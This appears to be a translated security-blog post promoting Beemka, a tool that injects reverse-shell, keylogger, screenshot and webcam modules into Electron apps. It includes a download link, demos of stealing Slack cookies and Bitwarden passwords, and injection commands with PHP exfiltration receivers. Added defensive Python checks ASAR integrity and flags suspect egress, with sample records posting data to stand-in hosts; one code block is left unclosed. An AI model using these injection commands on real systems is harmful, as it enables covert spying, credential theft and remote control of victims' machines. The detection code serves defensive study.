# An exploitation tool for Electron apps
Urkc安全 2024-10-06 18:00
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQm8jgLG6cJ9kzyfibwaonj9C7b6Qm5aiarjjklbgeQTVMstPBJmtuNhFg/640?wx_fmt=gif&from=appmsg "")
**BEEMKA: an exploitation tool for Electron apps**
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbic2Kv3nLL7U86P6OSF4XDnKRjcdKaic50k6cw2y37OAic9bia4OErhKIQ/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
**Project introduction**
Beemka is a basic exploitation tool for Electron applications. It lets the user inject code into an Electron app and ships several modules that perform different actions, such as a reverse shell, screenshots and keylogging. The project is intended to help security researchers and developers understand and test the security of Electron apps.
**Download URL**
https://codeload.github.com/ctxis/beemka/zip/refs/heads/master
**PART.1**
**BSidesLV Slack cookie exfiltration demo**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQCx6d92Yh0jrTrRPBJ5n1liak37jLRpnwchzTlzVPrhlSfkgc4BMXjWQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQRenTn5T9aUvj1ibo2etnOjKErq62b4zGmwxZaqtkxRceuzNXhDNMdLw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ8oQbvwJicRpJfyBrVd684Yq3AeqbJTD9UuB49LK49sibe9Uj76wt1Cibg/640?wx_fmt=png&from=appmsg "")
**Take b, x, d and their corresponding values and use them to log in**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ2Vq7RqKWbMkXCOLbOpdgtbVvhogyd6xicibIJrSIBFddwCCSu6aBq2iag/640?wx_fmt=png&from=appmsg "")
**Refresh to get in**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQVkebQM8HEc8XQjLx5v8HD2nNSYicS0Nu7AMvd5ny4I6h3kwHBYDjYOg/640?wx_fmt=png&from=appmsg "")
Reference video:
https://www.youtube.com/watch?v=hRX7kT2r7LA
**PART.2**
**BSidesLV VSCode source code exfiltration demo**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQVHnOAdF7gxOnbVntloABAxlWd2sfpghbpSCcBicXEibdDTX0R7Bxsl0Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQzkkVtLlGg2Bfjk97xic1PXH1KU5cvia263NWVHrHKJjtRP7tjOpZgteA/640?wx_fmt=png&from=appmsg "")
Reference video:
https://www.youtube.com/watch?v=pKWX3nelszQ
**PART.3**
**Bitwarden password exfiltration**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ5waJ0sCgkKFhvgWNvw1ETxzcg9YL4s1via2CMklkCRZCmOPE6xKqzdA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQC9uzQjTrsHMo1ufGgaCmzefoDx5sw2ibaOaicgIbhkkbEFy41tOlQ1Ow/640?wx_fmt=png&from=appmsg "")
**PART.4**
**Skype reverse shell**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQnBicyKwbGaUjYicYfrpZ4vqXJR5LYKcr2M3JmnKY4PMph9yQRJSUDLlA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQQJ8uDJln9gXSqGdl30saECSyPyAkuuzNoq81vWfuaqleqiaYcibicegcw/640?wx_fmt=png&from=appmsg "")
**PART.5**
**Slack desktop screenshot**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ9hKHGvwF0ozrX6TQ8mXCiabJiaJBLrcfia4CMeLbnZwAdTxjsRKslQS6Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQYEpKFcEfbVDSoF8vYrlaK6WOQqNxdGPldgY2xSaiadgqQVHdHicR1NiaA/640?wx_fmt=png&from=appmsg "")
**PART.6**
**VS Code webcam**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQDdhib42iaLlUQGnTqsUJiaVv3NO0rMtTUHEPFcvfGMleNwAcaFYZWVZsQ/640?wx_fmt=png&from=appmsg "")
**PART.7**
**Requirements**
- Python 3.5+
- JSMIN
**PART.8**
**Installation and usage guide**
**Installation**
```
pip3 install -r requirements.txt
```
**Modules**
```
python3 beemka.py --list
Available modules
[ rshell_cmd ]          Windows Reverse Shell
[ rshell_linux ]        Linux Reverse Shell
[ screenshot ]          Screenshot Module
[ rshell_powershell ]   PowerShell Reverse Shell
[ keylogger ]           Keylogger Module
[ webcamera ]           WebCamera Module
```
**Features**
```
usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                   [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                   [-m MODULE] [-u] [-z]
optional arguments:
 -h, --help            show this help message and exit
 -v, --version         show program's version number and exit
 -l, --list-modules    List all available modules.
 -i, --inject          Inject code into Electron.
 -f ASAR_FILE, --asar ASAR_FILE
                       Path to electron.asar file.
 -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                       Temporary working path to use for extracting asar
                       archives.
 -o OUTPUT_FILE, --output OUTPUT_FILE
                       Path to the file that will be generated.
 -m MODULE, --module MODULE
                       Module to inject. Use --list-modules to list available
                       modules.
 -u, --unpack          Unpack asar file.
 -z, --pack            Pack asar file.
```
**Inject a module into an application:**
```
python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"
```
The Beemka project has no dedicated configuration file; it is configured entirely through command-line arguments. For example, --asar specifies the path to Electron's ASAR file and --module selects the module to inject.
Example:
```
# example command
python3 beemka.py --asar /path/to/asar/file --module rshell_cmd
```
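Every module above works the same way: Beemka unpacks the application's ASAR archive, adds its JavaScript, and repacks the file, so the defensive counterpart is verifying that the archive still matches what the vendor shipped. The script below is an added example written for this page; it is not part of Beemka or of Electron. It parses the ASAR on-disk layout (a Pickle-framed JSON header followed by the concatenated file contents), builds a per-file SHA-256 manifest, diffs it against a trusted baseline, and computes the SHA-256 of the raw header JSON, which is the value Electron's embedded ASAR integrity validation (the EnableEmbeddedAsarIntegrityValidation fuse) pins. The `pack_asar` helper and the `CLEAN`/`TAMPERED` archives are constructed inline so the example runs offline; against a real installation you would read `resources/app.asar` from disk and keep the baseline manifest from a known-good copy.

```python
import hashlib
import json
import struct


def pack_asar(files: dict) -> bytes:
    """Build a minimal flat ASAR archive (constructed helper for the demo).
    Real archives come from @electron/asar, but the layout is the same:
    [u32 4][u32 header_len][u32 payload_len][u32 json_len][json, 4-byte padded][file data]."""
    entries, blob = {}, b""
    for name, content in files.items():
        entries[name] = {"size": len(content), "offset": str(len(blob))}
        blob += content
    header_json = json.dumps({"files": entries}, separators=(",", ":")).encode()
    padded = header_json + b"\0" * (-len(header_json) % 4)
    header_pickle = struct.pack("<II", 4 + len(padded), len(header_json)) + padded
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + blob


def read_asar(data: bytes):
    """Return (parsed header, raw header JSON bytes, offset where file data begins)."""
    _, header_len, _, json_len = struct.unpack_from("<IIII", data, 0)
    raw_json = data[16:16 + json_len]
    return json.loads(raw_json), raw_json, 8 + header_len


def header_hash(data: bytes) -> str:
    """SHA-256 over the header JSON: what Electron's ASAR integrity check compares."""
    _, raw_json, _ = read_asar(data)
    return hashlib.sha256(raw_json).hexdigest()


def manifest(data: bytes) -> dict:
    """Map every path inside the archive to the SHA-256 of its bytes."""
    header, _, base = read_asar(data)
    out = {}

    def walk(node, prefix):
        for name, entry in node["files"].items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:            # directory entry: recurse
                walk(entry, path)
            elif "offset" in entry:         # regular packed file
                start = base + int(entry["offset"])
                out[path] = hashlib.sha256(data[start:start + entry["size"]]).hexdigest()
            else:                           # "unpacked": true entries live outside the archive
                out[path] = "unpacked"

    walk(header, "")
    return out


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Report paths that were added, removed or whose content hash changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
    }


def check(clean: bytes, suspect: bytes) -> dict:
    """Compare a suspect archive against a trusted baseline archive."""
    result = diff_manifest(manifest(clean), manifest(suspect))
    result["header_hash_matches"] = header_hash(clean) == header_hash(suspect)
    return result


# Constructed sample: a pristine archive and a copy whose entry point was edited
# and which carries one extra file next to it.
CLEAN = pack_asar({"main.js": b"require('./app');",
                   "package.json": b'{"main":"main.js"}'})
TAMPERED = pack_asar({"main.js": b"require('./app');require('./extra');",
                      "package.json": b'{"main":"main.js"}',
                      "extra.js": b"/* extra module */"})

if __name__ == "__main__":
    print(json.dumps(check(CLEAN, TAMPERED), indent=2))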
### Exfiltration helpers
The ./server directory contains the following files:
**1. text.php**
This file receives the data sent by the keylogger module.
Before use, make sure to update the "$storage" parameter at the top of the file.
**2. image.php**
This file receives the data sent by the webcamera and screenshot modules.
Before use, make sure to update the "$storage" parameter at the top of the file.
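The receivers above are ordinary HTTP endpoints, which means the injected modules have to leave the host over the network from inside a process that normally only talks to its vendor. That is the observable a defender can key on. The following Python is an added example (not Beemka's code) that scans constructed JSON-lines egress records (one per outbound request, as a proxy or EDR would emit) and flags requests from the Electron apps named in this post when they go to a host outside that app's expected set, POST to a path ending in the helper file names, or upload over plain HTTP. `EXPECTED_HOSTS`, the record schema and `SAMPLE_LOG` are all assumptions made for the demo; in practice the host baseline comes from your own telemetry.

```python
import json
from urllib.parse import urlsplit

# Constructed baseline: hosts each monitored Electron app is expected to contact.
# Real deployments build this from observed telemetry, not from a hard-coded table.
EXPECTED_HOSTS = {
    "slack": {"slack.com", "slack-edge.com"},
    "code": {"update.code.visualstudio.com", "marketplace.visualstudio.com"},
    "skype": {"skype.com", "live.com"},
    "bitwarden": {"bitwarden.com"},
}
# Receiver file names shipped in Beemka's ./server directory.
HELPER_PATHS = ("/text.php", "/image.php")


def host_allowed(process: str, host: str) -> bool:
    """True if host is, or is a subdomain of, one of the app's expected hosts."""
    for expected in EXPECTED_HOSTS.get(process, set()):
        if host == expected or host.endswith("." + expected):
            return True
    return False


def classify(event: dict) -> list:
    """Return the reasons an outbound request looks like module exfiltration ([] if none)."""
    reasons = []
    proc = event["process"].lower()
    if proc not in EXPECTED_HOSTS:
        return reasons                      # not one of the monitored Electron apps
    url = urlsplit(event["url"])
    if not host_allowed(proc, url.hostname or ""):
        reasons.append("unexpected-destination")
    if event["method"] == "POST" and url.path.lower().endswith(HELPER_PATHS):
        reasons.append("beemka-helper-endpoint")
    if event["method"] == "POST" and url.scheme == "http":
        reasons.append("plaintext-upload")
    return reasons


def scan(lines) -> list:
    """Parse JSON-lines egress records and return the flagged events with their reasons."""
    flagged = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = classify(ev)
        if reasons:
            flagged.append({"ts": ev["ts"], "process": ev["process"],
                            "url": ev["url"], "reasons": reasons})
    return flagged


# Constructed sample records (TEST-NET-2 address and example.net used as stand-ins).
SAMPLE_LOG = """
{"ts":"2024-10-06T10:00:01Z","process":"slack","method":"GET","url":"https://app.slack.com/client","bytes_out":512}
{"ts":"2024-10-06T10:00:05Z","process":"slack","method":"POST","url":"http://198.51.100.23/text.php","bytes_out":940}
{"ts":"2024-10-06T10:00:35Z","process":"slack","method":"POST","url":"http://198.51.100.23/text.php","bytes_out":1210}
{"ts":"2024-10-06T10:01:00Z","process":"code","method":"GET","url":"https://marketplace.visualstudio.com/_apis/public/gallery","bytes_out":300}
{"ts":"2024-10-06T10:01:12Z","process":"code","method":"POST","url":"https://uploads.example.net/image.php","bytes_out":88320}
{"ts":"2024-10-06T10:02:00Z","process":"firefox","method":"POST","url":"http://198.51.100.23/text.php","bytes_out":40}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["process"], hit["url"], ",".join(hit["reasons"]))
```

The firefox record is deliberately left unflagged: the point of the rule is per-process expectation, and a browser POSTing to an arbitrary host is normal. For the monitored apps, the strongest single signal is the destination not being in the app's baseline; the helper-path and plaintext checks only add confidence, since an operator can rename the receivers or put them behind TLS.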
**PART.9**
**Summary**
**Use cases**
- Security testing: Beemka can be used to test the security of Electron apps, injecting malicious code to check how the app responds and what defences it has.
- Penetration testing: penetration testers can use Beemka to simulate attacks and assess a system's security.
**Best practices**
- Keep up to date: use the latest versions of Beemka and of the Electron apps to avoid known security vulnerabilities.
- Access control: when using Beemka in a test environment, make sure appropriate access controls are in place so that production environments are not affected.
**Typical ecosystem projects**
- Electron: Beemka primarily operates on Electron applications. Electron is a framework for building cross-platform desktop apps with JavaScript, HTML and CSS.
- Node.js: Beemka depends on a Node.js environment. Node.js is a JavaScript runtime built on Chrome's V8 engine.